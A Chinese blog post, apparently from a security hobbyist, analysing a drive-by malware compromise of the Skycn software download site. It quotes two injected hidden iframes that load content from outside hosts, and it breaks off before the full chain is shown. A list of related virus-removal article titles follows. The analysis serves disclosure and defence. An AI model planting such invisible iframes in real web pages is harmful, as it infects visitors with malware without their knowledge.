天空软件站是中国最大的软件下载站之一,如今它被挂马了,那么想必已经有几千万人中招了。Monyer并不是危言耸听,下面的分析将证明这不是个笑话。
今天偶尔上天空看我的UDisk时(重要提醒,天空有病毒不要打开,晕了!),发现Maxthon居然弹出程序运行警告,提示我在c盘下有个c.exe文件要运行,不知道其他人遇到这种情况怎么想,反正从我电脑上出现便成了一件恐怖的事情。看了看任务管理器,内存已经增加了几百兆,很显然被溢出了。再看看C盘的根目录,一个c.exe文件正躺在那里。于是便开始了以下寻马之旅。
通过对天空站的分析,被挂马的页面仅存在于软件下载页面。再通过对加进的javascript和iframe的排除,最后落定被插入的恶意代码为:
| 以下是引用片段: <iframe name=import_frame width=1 height=1 src=http://iplog.skycn.com/wherefrom.php?id=32336 frameborder=no></iframe> |
它将框架的宽高设为1像素即肉眼不可见。下载whereform.php文件发现里面有另外的代码:
| 以下是引用片段: <iframe src=http://www.ip17173.cn/index.html?419891509 width=100 height=0></iframe> |
又一个框架,直接访问将看到两个计数器,挺有意思
| 天空软件站被挂马 | 10-05 | |
| QQ尾巴+社会工程学+第三方Active | 09-27 | |
| 瑞星杀毒软件2008版 “主动防御” | 08-20 | |
| 手动清除AV终结者 | 08-17 | |
| 邪恶的ghost.pif又出新变种(兼答 | 08-14 | |
| Windows软件防火墙实现技术简述 | 07-07 | |
| 手工清除向好友发送信息的新QQ尾 | 06-12 | |
| 杜绝ARP欺骗--利用LnS防范ARP欺骗 | 06-12 | |
| 杀毒软件之十大怪现状 | 06-02 | |
| DL1.EXE U盘病毒的清除教程 | 05-30 | |
| Evilotus木马清除手记 | 05-16 | |
| 教你清除局域网中的ARP病毒 | 05-16 | |